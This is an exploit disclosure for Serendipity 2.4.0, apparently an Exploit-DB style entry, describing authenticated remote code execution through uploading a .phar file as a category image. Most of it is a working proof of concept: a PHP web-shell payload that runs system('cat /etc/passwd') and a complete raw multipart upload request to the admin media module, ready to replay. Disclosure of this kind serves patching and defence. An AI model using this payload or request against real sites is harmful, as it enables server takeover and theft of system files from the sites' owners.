Serendipity 2.4.0 - Remote Code Execution (RCE) (Authenticated)

Exploit Title: Serendipity 2.4.0  - Remote Code Execution (RCE) (Authenticated)
Application: Serendipity 
Version:  2.4.0 
Bugs:  Remote Code Execution (RCE) (Authenticated) via file upload
Technology: PHP
Vendor URL: https://docs.s9y.org/
Software Link: https://docs.s9y.org/downloads.html
Date of found: 13.04.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
If we load the poc.phar file in the image field while creating a category, we can run commands on the system.
<?php echo system("cat /etc/passwd"); ?>
 I wrote a file with the above payload, a poc.phar extension, and uploaded it.

Visit to http://localhost/serendipity/uploads/poc.phar

poc request:


POST /serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[htmltarget]=category_icon&serendipity[filename_only]=true&serendipity[noBanner]=true&serendipity[noSidebar]=true&serendipity[noFooter]=true&serendipity[showUpload]=true&serendipity[showMediaToolbar]=false&serendipity[sortorder][perpage]=8&serendipity[sortorder][order]=i.date&serendipity[sortorder][ordermode]=DESC HTTP/1.1
Host: localhost
Content-Length: 1561
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZWKPiba66PSVGQzc
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect&serendipity[adminModule]=media&serendipity[htmltarget]=category_icon&serendipity[filename_only]=true&serendipity[noBanner]=true&serendipity[noSidebar]=true&serendipity[noFooter]=true&serendipity[showUpload]=true&serendipity[showMediaToolbar]=false&serendipity[sortorder][perpage]=8&serendipity[sortorder][order]=i.date&serendipity[sortorder][ordermode]=DESC
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: serendipity[old_session]=st6cvq3rea6l8dqgjs1nla6s1b; serendipity[author_token]=430b341df3f78f52691c8cf935fa04e1c05854df; serendipity[toggle_extended]=; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; serendipity[only_path]=; serendipity[only_filename]=; serendipity[hideSubdirFiles]=; serendipity[addmedia_directory]=; serendipity[sortorder_perpage]=8; serendipity[sortorder_order]=i.date; serendipity[sortorder_ordermode]=DESC; serendipity[filter][i.date][from]=; serendipity[filter][i.date][to]=; serendipity[filter][i.name]=; serendipity[imgThumbWidth]=400; serendipity[imgThumbHeight]=267; serendipity[imgWidth]=1000; serendipity[imgHeight]=667; serendipity[imgID]=1; serendipity[baseURL]=http%3A//localhost/serendipity/; serendipity[indexFile]=index.php; serendipity[imgName]=/serendipity/uploads/photo-1575936123452-b67c3203c357.jpeg; serendipity[thumbName]=/serendipity/uploads/photo-1575936123452-b67c3203c357.serendipityThumb.jpeg; serendipity[hotlink]=; serendipity[serendipity_htmltarget]=category_icon; serendipity[serendipity_filename_only]=true; serendipity[serendipity_linkThumbnail]=no; serendipity[]=Done; accessibletab_mediaupload_tabs_active=0; serendipity[filter][fileCategory]=; s9y_6991e531dd149036decdb14ae857486a=st6cvq3rea6l8dqgjs1nla6s1b
Connection: close

------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[token]"

ae9b8ae35a756c24f9552a021ee81d56
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[action]"

admin
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[adminModule]"

media
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[adminAction]"

add
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[userfile][1]"; filename="poc.phar"
Content-Type: application/octet-stream

<?php echo system("cat /etc/passwd");?>

------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[target_filename][1]"

poc.phar
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[target_directory][1]"


------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[column_count][1]"

true
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[imageurl]"


------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[imageimporttype]"

image
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[target_filename][]"


------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[target_directory][]"


------WebKitFormBoundaryZWKPiba66PSVGQzc--


poc video :  https://youtu.be/_VrrKOTywgo